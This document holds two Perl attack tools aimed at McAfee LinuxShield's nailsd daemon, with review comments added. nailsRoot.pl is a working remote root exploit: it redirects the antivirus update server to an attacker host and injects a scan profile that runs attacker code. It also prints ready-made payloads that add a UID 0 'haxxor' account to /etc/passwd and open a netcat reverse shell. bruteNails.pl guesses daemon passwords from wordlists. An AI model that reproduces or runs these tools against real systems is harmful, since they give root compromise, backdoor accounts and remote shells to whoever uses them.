------------------nailsRoot.pl-------------------------
#!/usr/bin/perl
## # Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit # Name: nailsRoot.pl # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> # WARNING: This Exploit deletes the default Update Server # # Use it only for education or ethical pentesting! The author accepts # no liability for damage caused by this tool. # ##
use strict; use IO::Socket::SSL; use Getopt::Std;
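my %args;
my $ack;          # last protocol reply; shared with stOne()/stTwo()
my $timestamp;    # transaction id returned by "sconf ODS_99 begin"; used by stTwo()

# The option string is already in getopts() format (a trailing ':' marks a
# switch that takes a value); getopts() also rejects unknown switches instead
# of silently accepting them as the original getopt() call did.
getopts('h:p:u:v:e:a:g:', \%args) or usage();

# -g only prints a helper payload script and exits; handle it before anything
# that needs a target.
my $gen_exec = $args{g};
genEx($gen_exec) if defined $gen_exec;

my $target_host = $args{h} || usage();
my $target_port = $args{p} || 65443;
my $nails_user  = $args{u} || usage();
# The password travels on the command line, so it is visible in the process
# list of the attacking host. A literal "0" is a valid password, hence a
# defined-test instead of "||" (which treated "0" as no password).
my $nails_pass  = defined $args{v} ? $args{v} : "";
# Path of the binary nailsd will launch as its "scanner". The default is the
# location where stage one makes the AV updater drop the attacker-served
# catalog.z; any other value skips the download (stage two only).
my $exec_path   = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z";
my $my_host     = $args{a} || "";

# Every value below is spliced unescaped into single-line, space-separated
# daemon commands and into an XML attribute. Reject input that would break
# that framing instead of sending a silently corrupted payload.
if ($target_port !~ /\A\d+\z/) {
    print "[-] Invalid target port: $target_port\n";
    exit(1);
}
if ($exec_path =~ /\s/) {
    print "[-] The -e path must not contain whitespace\n";
    exit(1);
}
# The injected site list hard-codes ":80" right after the host (see
# $setrepo2), so -a must be a bare hostname or IPv4 address: no port, no
# IPv6 literal.
if ($my_host ne "" && $my_host !~ /\A[A-Za-z0-9.\-]+\z/) {
    print "[-] The -a host must be a plain hostname or IPv4 address (port 80 is implied)\n";
    exit(1);
}

# Random name for the injected schedule-table task so reruns do not collide.
my $range      = 50000000;
my $minimum    = 90000000;
my $randomtask = int(rand($range)) + $minimum;

my $pre  = "sconf ODS_99 ";   # config-transaction prefix for profile ODS_99
my $post = "\x0d\x0a";        # CRLF line terminator the daemon expects

# Stage one payload: overwrites repository row 1 -- the default update server,
# hence the warning in the header -- with an HTTP repository on -a, port 80.
# The host is spliced between the two halves. Spaces inside the value are
# escaped as "\ " because "db set" is a single space-separated line.
my $setrepo1 = 'db set 1 _table=repository status=1 siteList='
    . '<?xml\ version="1.0"\ encoding="UTF-8"?>'
    . '<ns:SiteLists\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Client">'
    . '<SiteList\ Default="1"\ Name="SomeGUID">'
    . '<HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"\ Server="';
my $setrepo2 = ':80"\ Enabled="1"\ Local="1">'
    . '<RelativePath>nai</RelativePath>'
    . '<UseAuth>0</UseAuth><UserName></UserName><Password\ Encrypted="0"/>'
    . '</HttpSite></SiteList></ns:SiteLists> _cmd=update';
my $setsite = "task setsitelist";
my $begin   = "begin";
my $set     = "set ";

# Stage two payload: a complete on-demand scan profile whose scannerPath is
# the attacker-controlled binary, so the daemon launches it in place of the
# real scanner (the root privileges the title refers to are the daemon's
# own). Settings are joined into one space-separated line.
my @profile_settings = (
    'nailsd.profile.ODS_99.allFiles=true',
    'nailsd.profile.ODS_99.childInitTmo=60',
    'nailsd.profile.ODS_99.cleanChildren=2',
    'nailsd.profile.ODS_99.cleansPerChild=10000',
    # NOTE(review): every other key is ODS_99; "ODS_5" is kept verbatim from
    # the original payload but looks like a typo -- verify on a target before
    # relying on the DAT path being applied.
    'nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat',
    'nailsd.profile.ODS_99.decompArchive=true',
    'nailsd.profile.ODS_99.decompExe=true',
    'nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib',
    'nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so',
    'nailsd.profile.ODS_99.factoryInitTmo=60',
    'nailsd.profile.ODS_99.heuristicAnalysis=true',
    'nailsd.profile.ODS_99.macroAnalysis=true',
    'nailsd.profile.ODS_99.maxQueSize=32',
    'nailsd.profile.ODS_99.mime=true',
    'nailsd.profile.ODS_99.noJokes=false',
    'nailsd.profile.ODS_99.program=true',
    'nailsd.profile.ODS_99.quarantineChildren=1',
    'nailsd.profile.ODS_99.quarantineDirectory=/quarantine',
    'nailsd.profile.ODS_99.quarantinesPerChild=10000',
    'nailsd.profile.ODS_99.scanChildren=2',
    'nailsd.profile.ODS_99.scanMaxTmo=301',
    'nailsd.profile.ODS_99.scanNWFiles=true',
    'nailsd.profile.ODS_99.scanOnRead=true',
    'nailsd.profile.ODS_99.scanOnWrite=true',
    "nailsd.profile.ODS_99.scannerPath=$exec_path",
    'nailsd.profile.ODS_99.scansPerChild=10000',
    'nailsd.profile.ODS_99.slowScanChildren=0',
    'nailsd.profile.ODS_99.filter.0.type=exclude-path',
    'nailsd.profile.ODS_99.filter.0.path=/proc',
    'nailsd.profile.ODS_99.filter.0.subdir=true',
    'nailsd.profile.ODS_99.filter.extensions.mode=all',
    'nailsd.profile.ODS_99.filter.extensions.type=extension',
    'nailsd.profile.ODS_99.action.Default.primary=Clean',
    'nailsd.profile.ODS_99.action.Default.secondary=Quarantine',
    'nailsd.profile.ODS_99.action.App.primary=Clean',
    'nailsd.profile.ODS_99.action.App.secondary=Quarantine',
    'nailsd.profile.ODS_99.action.timeout=Pass',
    'nailsd.profile.ODS_99.action.error=Block',
);
my $profile = ' ' . join(' ', @profile_settings);

my $commit = "commit ";

# Stage two: a new schedule-table row that runs profile ODS_99 against
# /root/tmp. (An earlier variant updated an existing row instead:
# "update _where= i_taskId=2".)
my $setdb = " _table=schedule taskName=$randomtask taskType=On-Demand"
    . " taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false"
    . " timetable=type=unscheduled taskResults=0 i_lastRun=1260318482"
    . " status=Stopped _cmd=insert";
my $execupd = "task nstart LinuxShield Update";
my $execute = "task nstart $randomtask";

banner();

# The default -e path means "use the file stage one downloads", which needs
# an attacker host; any other -e goes straight to stage two.
if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") {
    usage() if $my_host eq "";
    stOne();
}
else {
    stTwo();
}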
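# Stage one: repoint the daemon's update repository at the attacker's HTTP
# server and trigger an AV update, so the daemon itself fetches
# nai/catalog.z into its scratch directory. Chains into stTwo() at the end.
# Uses the file-level $target_host, $target_port, $nails_user, $nails_pass,
# $setrepo1/$setrepo2, $my_host, $setsite, $execupd and $post.
sub stOne {
    my $reposock = IO::Socket::SSL->new(
        PeerAddr        => $target_host,
        PeerPort        => $target_port,
        Proto           => 'tcp',
        # The original never verified the peer (the IO::Socket::SSL default of
        # its day). Make that explicit: newer versions verify by default and
        # would refuse a certificate they cannot validate. The consequence is
        # that the credentials go to whoever answers on this port.
        SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE(),
    );
    if (!defined $reposock) {
        # The original silently fell through to stage two on a failed
        # connect; stage two cannot succeed without the download, so stop.
        my $why = IO::Socket::SSL::errstr() || $!;
        print "[-] Stage One: cannot connect to $target_host:$target_port: $why\n";
        exit(1);
    }

    print "[*] Executing Stage One\n";
    print "-----------------------\n";

    $ack = <$reposock>;    # server greeting
    print $ack if defined $ack;

    print $reposock "auth " . $nails_user . " " . $nails_pass . $post;
    $ack = <$reposock>;
    if (!defined $ack) {
        print "[-] No reply to auth (connection closed?)\n";
        exit(1);
    }
    if ($ack =~ m/ERR authentication failure/) {
        print "[-] Authentication failed...\n";
        exit(1);
    }
    print $ack;
    sleep(1);

    print "[+] Repo update: inject evil repo\n";
    print $reposock $setrepo1 . $my_host . $setrepo2 . $post;
    # NOTE(review): the reply to this "db set" is never read, so the line
    # consumed after "task setsitelist" below may actually be this command's
    # response; the fixed sleeps are the only synchronisation. Confirm the
    # daemon's reply pattern before trusting the echoed status lines.
    sleep(1);

    print "[+] Repo Site update: update site task\n";
    print $reposock $setsite . $post;
    $ack = <$reposock>;
    print $ack if defined $ack;
    sleep(1);

    print "[+] Execute AV Update: downloading evil code\n";
    print $reposock $execupd . $post;
    sleep(5);    # give the updater time to fetch catalog.z
    $reposock->shutdown(1);

    stTwo();
}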
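# Stage two: inside an "sconf ODS_99" transaction, install a scan profile
# whose scannerPath is $exec_path, commit it, insert a schedule-table task
# that uses the profile and start that task. Uses the file-level
# $target_host, $target_port, $nails_user, $nails_pass, $pre, $begin, $set,
# $profile, $commit, $setdb, $execute, $randomtask, $post and writes $ack
# and $timestamp.
sub stTwo {
    my $sock = IO::Socket::SSL->new(
        PeerAddr        => $target_host,
        PeerPort        => $target_port,
        Proto           => 'tcp',
        # Explicit "no verification": matches the original's behaviour on old
        # IO::Socket::SSL and keeps the handshake working on versions that
        # verify by default. Credentials are sent to an unauthenticated peer.
        SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE(),
    );
    if (!defined $sock) {
        print "[-] some troubles with connection: $!\n";
        return;
    }

    print "\n\n[*] Executing Stage TWO\n";
    print "-----------------------\n";

    $ack = <$sock>;    # server greeting
    print $ack if defined $ack;

    print $sock "auth " . $nails_user . " " . $nails_pass . $post;
    $ack = <$sock>;
    if (!defined $ack) {
        print "[-] No reply to auth (connection closed?)\n";
        exit(1);
    }
    if ($ack =~ m/ERR authentication failure/) {
        print "[-] Authentication failed...\n";
        exit(1);
    }
    print $ack;
    sleep(1);

    # "sconf ODS_99 begin" opens a config transaction. Whatever follows
    # "+OK " in the reply is the transaction id ("timestamp") that every
    # set/commit/db set below must carry. The original used the reply
    # blindly; a non-+OK answer would have produced garbage commands.
    print $sock $pre . $begin . $post;
    $ack = <$sock>;
    if (!defined $ack || $ack !~ m/\+OK /) {
        my $shown = defined $ack ? $ack : "<no reply>";
        print "[-] 'sconf begin' did not return +OK: $shown\n";
        exit(1);
    }
    print $ack;
    ($timestamp = $ack) =~ s/\+OK //g;
    $timestamp =~ s/\s+$//;
    print "[+] Timestamp: $timestamp\n";

    # Replies to the remaining commands are not consumed; nothing else is read
    # from this socket, so unread responses are harmless here.
    print "[+] Profile: Injecting evil Profile\n";
    print $sock $pre . $set . $timestamp . $profile . $post;
    sleep(1);

    print "[+] Commit: Profile changes\n";
    print $sock $pre . $commit . $timestamp . $post;
    sleep(1);

    print "[+] Schedule: Injecting evil task $randomtask\n";
    print $sock "db set " . $timestamp . $setdb . $post;
    sleep(1);

    print "[+] Excute: Task $randomtask\n";
    print $sock $execute . $post;
    $sock->shutdown(1);
    print "[+] Done... Check whatever you did\n";
}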
# Prints the command-line help for nailsRoot.pl to STDOUT and exits with
# status 1. Called for missing mandatory options as well.
sub usage {
    print << "USAGE";

 nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit
===============================================================

 Usage:
 $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]
 Optional:
 -a <attacker host with httpd>
 -e <executable file on target host>
 -p <target port (default: 65443)>
 -g (1|2) <generat shell scripts to execute>
 1 <UID 0 user add>
 2 <reverse nc shell>
 Notes:
 -We can not handle arguments given to executable
 in the -e option.
 -To download your own evil executable, start a httpd
 and set the -a option. Create the directory <nai> in
 your wwwroot and rename your executable to <catalog.z>
 Author:
 Nikolas Sotiriu (lofi)
 url: www.sotiriu.de
 mail: lofi[at]sotiriu.de

USAGE
    exit(1);
}
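# Prints a ready-made payload script to STDERR for the given -g code and
# exits with status 1. The user is expected to save the cut/cut block as
# nai/catalog.z on the web root of the host given with -a.
#   1 - appends a UID 0 user to /etc/passwd
#   2 - reverse shell using "nc -e"
# An unknown code previously exited without printing anything.
sub genEx {
    my ($code) = @_;
    $code = '' unless defined $code;

    if ($code eq '1') {
        print STDERR << "EOF";
============== UID 0 user add ==============
Copy this lines to the catalog.z file.
USER=haxxor PASS=haxxorPass
-------------- cut --------------
#!/bin/sh
echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd
-------------- /cut --------------
EOF
    }
    elsif ($code eq '2') {
        # Not every netcat build supports -e (OpenBSD's does not); adapt the
        # callback to whatever nc the target ships.
        print STDERR << "EOF";
============== reverse nc shell ==============
Copy this lines to the catalog.z file.
-------------- cut --------------
#!/bin/sh
nc -nv <yourip> 4444 -e /bin/sh
-------------- /cut --------------
EOF
    }
    else {
        print STDERR "[-] Unknown -g value '$code': use 1 (UID 0 user add) or 2 (reverse nc shell)\n";
    }
    exit(1);
}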
sub banner {
    # Prints the tool banner to STDERR so STDOUT keeps only the daemon
    # replies and progress lines. The heredoc body below was flattened onto
    # one line by extraction; it is terminated by the EOF line.
    print STDERR << "EOF"; -------------------------------------------------------------------------------- nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit -------------------------------------------------------------------------------- 111 1111111 11100 101 00110111001111 11101 11 10 111 101 1001111111 1101 11 00 10 11 11 111 1111111101 10111 1 10 11 10 0 10 1 1 1 1111111011 1111 1 1 10 0 01 01 01 1 1 111 1111011101 1000 0 11 10 10 0 10 11 111 11111 11 1111 111100 1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11 10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111 101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111 011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001 1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001 1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101 011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01 1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111 111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111 111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001 111 1011111 1 11111111110111111111111111111111111111111 01 10111001 11 1100 10110110 10001 11101111111111111111 10 111 11100 111 00 1011101 00101 0 11111111111111111001 11 111101 11 00 00 101 1000011 1011 1111 1111111000 1111111 0 11 00 0 1011 100001 101000 1 1001 00001111 01 01101 11111 1011 01100 0101 110 11 10 10111 1 0 01 0000011 10 10 10011 11100 1111 101 11 1110 01 101011 1001100 1111000011 1 111 11000001111 1
EOF }
---------------------------bruteNails.pl--------------------------
#!/usr/bin/perl
## # Title: Brute force for McAfee LinuxShield nailsd # Name: bruteNails.pl # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> # NOTE: unlike nailsRoot.pl, this tool only sends "auth" attempts and does not modify the target's update server; it is still a noisy, unthrottled credential-guessing tool # # Use it only for education or ethical pentesting! The author accepts # no liability for damage caused by this tool. ##
use IO::Socket::SSL; use strict; use Getopt::Long; Getopt::Long::config qw(no_ignore_case);
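$|=1;    # unbuffered STDOUT so hits appear as they happen

my $total = 0;
my ($host, $user, $passwd, $debug, $tout, $ufile, $pfile);
my $stime = time();

my $opts = GetOptions(
    'host:s'   => \$host,
    'user:s'   => \$user,
    'passwd:s' => \$passwd,
    'debug:i'  => \$debug,
    'tout:i'   => \$tout,
    'Ufile:s'  => \$ufile,
    'Pfile:s'  => \$pfile,
);

# Defaults. These used to be written as "my $x = ... if !$x", which both
# re-declared variables from the list above and relied on the undefined
# behaviour of a conditional "my". There is no port option; 65443 is fixed.
my $ip   = $host;
my $port = "65443";
$tout = "10" unless $tout;
my $post = "\x0d\x0a";    # CRLF line terminator the daemon expects

help() unless $opts;
help() if !$host;
help() if !$user && !$ufile;
help() if !$passwd && !$pfile;
help() if $ufile && $user;
help() if $pfile && $passwd;

banner();
print "#" x 80;
print "\nTrying: $ip:$port ($tout secs)\n";
print "Running ....\n";

# Reads a wordlist into memory, one entry per line. Strips "\r\n" as well as
# "\n" so a DOS-format list does not carry a trailing CR into every guess
# (chomp alone left it in). Empty lines are kept: "" is a legitimate guess.
sub read_list {
    my ($path, $err_prefix) = @_;
    open my $fh, '<', $path or die "$err_prefix : $!";
    my @entries;
    while (my $line = <$fh>) {
        $line =~ s/\r?\n\z//;
        push @entries, $line;
    }
    close $fh;
    return @entries;
}

# Candidate lists; a single -u/-p value becomes a one-element list. The
# password file is read once instead of being reopened for every user.
my @users  = $ufile ? read_list($ufile, "Can't open user file $ufile")   : ($user);
my @passes = $pfile ? read_list($pfile, "Can't open passwd file: $pfile") : ($passwd);

# A single fixed user/password pair always reports its failure; with lists
# failures are only shown under --debug so the output stays readable.
my $report_failures = $debug || (!$ufile && !$pfile);

# No delay and no lockout handling: every attempt opens a fresh TLS session
# to the daemon, which is easy to notice on the target side.
for my $u (@users) {
    for my $p (@passes) {
        # The "&" is required: a plain connect(...) resolves to the
        # CORE::connect builtin, not the sub of the same name defined below.
        my $ec = &connect($ip, $port, $u, $p);
        if ($ec == 0) {
            print "[+] GOT ONE: $u/$p - $ip:$port\n";
            $total++;
        }
        elsif ($report_failures) {
            print "[-] FAILED: $u/$p - $ip:$port\n";
        }
    }
}

my $ftime = time();
my $time  = $ftime - $stime;
print "Finished: ($total) users found. ($time secs)\n";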
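# Tries one user/password pair against nailsd over a fresh TLS connection.
# Returns 0 when the daemon answers "successful authentication", 1 otherwise.
# Dies if the connection itself cannot be established, so a persistent
# network failure is not reported as a wrong password for every pair.
# Reads the file-level $tout, $debug and $post.
sub connect {
    my ($ip, $port, $user, $passwd) = @_;
    my $ec = 1;
    my $socket = IO::Socket::SSL->new(
        PeerAddr => $ip,
        PeerPort => $port,
        Proto    => 'tcp',
        # --tout was parsed but never applied; without it a filtered port
        # blocks for the operating system's own connect timeout.
        Timeout  => $tout,
        # No certificate verification or pinning (the historic
        # IO::Socket::SSL default; newer versions verify by default and would
        # fail the handshake). Every guessed credential is therefore disclosed
        # to whoever answers on $ip:$port.
        SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE(),
    ) || die "Can't connect to: $ip:$port - $!\n";
    $socket->autoflush(1);

    my $greeting = <$socket>;
    print $greeting if $debug && defined $greeting;

    print $socket "auth " . $user . " " . $passwd . $post;
    my $ack = <$socket>;    # the original re-declared $ack here, shadowing the greeting
    print $ack if $debug && defined $ack;
    if (defined $ack && $ack =~ m/successful authentication/) {
        $ec = 0;
    }
    $socket->close();
    return $ec;
}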
# Prints the command-line help for bruteNails to STDOUT and exits with
# status 0. Short switches are Getopt::Long abbreviations of the long names.
sub help {
    my @text = (
        "bruteNails - McAfee nailsd bruteforcer by <nsotiriu\@sotiriu.de>",
        "usage: $0 -h <host> <[-u <user> | -U <file>] [-p <passwd> | -P <file>] [-t <n>] [-d <1|0>]",
        "options:",
        " -h, --host <host>\t\thost ",
        " -u, --user <user>\t\tusername",
        " -U, --Ufile <file>\t\tfile with users list",
        " -p, --passwd <passwd>\t\tpassword",
        " -P, --Pfile <file>\t\tfile with passwords list",
        " -t, --tout <n>\t\tconnection timeout (default: 10)",
        " -d, --debug <1|0>\t\tenable debug (default: 0)",
    );
    print map { "$_\n" } @text;
    exit 0;
}
sub banner {
    # Prints the tool banner to STDERR so STDOUT carries only the result
    # lines. The heredoc body below was flattened by extraction; it is
    # terminated by the EOF line.
    print STDERR << "EOF"; -------------------------------------------------------------------------------- bruteNails - McAfee nailsd bruteforcer by <nsotiriu\@sotiriu.de> --------------------------------------------------------------------------------
111 1111111 11100 101 00110111001111 11101 11 10 111 101 1001111111 1101 11 00 10 11 11 111 1111111101 10111 1 10 11 10 0 10 1 1 1 1111111011 1111 1 1 10 0 01 01 01 1 1 111 1111011101 1000 0 11 10 10 0 10 11 111 11111 11 1111 111100 1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11 10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111 101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111 011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001 1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001 1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101 011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01 1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111 111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111 111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001 111 1011111 1 11111111110111111111111111111111111111111 01 10111001 11 1100 10110110 10001 11101111111111111111 10 111 11100 111 00 1011101 00101 0 11111111111111111001 11 111101 11 00 00 101 1000011 1011 1111 1111111000 1111111 0 11 00 0 1011 100001 101000 1 1001 00001111 01 01101 11111 1011 01100 0101 110 11 10 10111 1 0 01 0000011 10 10 10011 11100 1111 101 11 1110 01 101011 1001100 1111000011 1 111 11000001111 1
EOF }